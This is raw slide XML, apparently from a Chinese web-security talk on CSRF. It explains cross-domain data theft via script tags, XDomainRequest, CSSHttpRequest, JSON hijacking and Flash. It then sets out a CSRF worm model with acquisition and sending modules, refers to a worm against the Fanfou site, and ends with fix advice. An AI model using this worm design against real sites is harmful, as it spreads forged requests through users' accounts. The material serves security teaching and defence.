          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>_l.addEventListener(Event.COMPLETE,function(){text1.text = _l.data});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>_l.load();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其它方法</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标签的跨域性质：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点有些根据用户唯一标识生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>也许包含唯一标识在这些文件中，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>var user_id = 2343;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>我们可以获取这样的全局变量。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XDomainRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点返回的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>头部中带有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XDomainRequestAllowed=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSSHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点返回这样格式的数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>@import url(about:chr:data);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>其实我们漏了非常重要的一点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>我们来控制初始唯一标识，这在饭否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫中会讲到。</a:t>
            </a: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2</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>、数据发送模块</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>唯一标识的作用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫数据处理中心对唯一标识对应的其它相关用户发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>就是这样的传播方式。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送伪造后的请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JavaScript, ActionScript, HTML/CSS, XML, ASP, PHP, JSP, .NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在客户端发送，否则带不上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>session/cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</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蠕虫模型</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="5214938"/>
            <a:ext cx="4929188" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫数据处理中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2214563"/>
            <a:ext cx="4929188" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>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US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web2.0——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="4572000"/>
            <a:ext cx="3071813" cy="500063"/>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1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>数据获取模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500688" y="4572000"/>
            <a:ext cx="1714500" cy="500063"/>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600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>数据发送模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圆角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214438" y="3857625"/>
            <a:ext cx="642937" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圆角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="4286250"/>
            <a:ext cx="1643062" cy="357188"/>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1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>服务端代理技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4714875"/>
            <a:ext cx="1428750" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圆角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214313" y="5143500"/>
            <a:ext cx="1643062" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="round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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(crossdomain.xml)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接连接符 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4037013"/>
            <a:ext cx="428625" cy="53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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4465638"/>
            <a:ext cx="428625" cy="24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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857375" y="4894263"/>
            <a:ext cx="428625" cy="3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3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1857375" y="5072063"/>
            <a:ext cx="428625" cy="322262"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>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500938" y="4143375"/>
            <a:ext cx="1500187" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>POST(form/flash)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500938" y="4572000"/>
            <a:ext cx="857250" cy="357188"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>GET(url)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7215188" y="4322763"/>
            <a:ext cx="285750" cy="24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8" idx="1"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7215188" y="4751388"/>
            <a:ext cx="285750" cy="714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下箭头 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143250" y="3071813"/>
            <a:ext cx="285750" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="65000"/>
              <a:lumOff val="3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200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="下箭头 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6215063" y="3071813"/>
            <a:ext cx="285750" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81941" name="TextBox 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311525" y="3643313"/>
            <a:ext cx="903288" cy="307975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>唯一标识</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饭否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>看这段录像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 7" descr="D:\KnownSec\CSRF-苏醒的巨人\fanfou-3.jpg">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1357290" y="2337771"/>
            <a:ext cx="6500858" cy="4144991"/>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2214563" y="2868613"/>
            <a:ext cx="4643437" cy="1000125"/>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2400"/>
              <a:t>四、修补建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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修补建议</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在服务端区严格区分好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的数据请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中不要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来直接获取数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>建议不要用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求来执行持久性操作，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> http://www.yeeyan.com/space/deleteEvent/16824</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
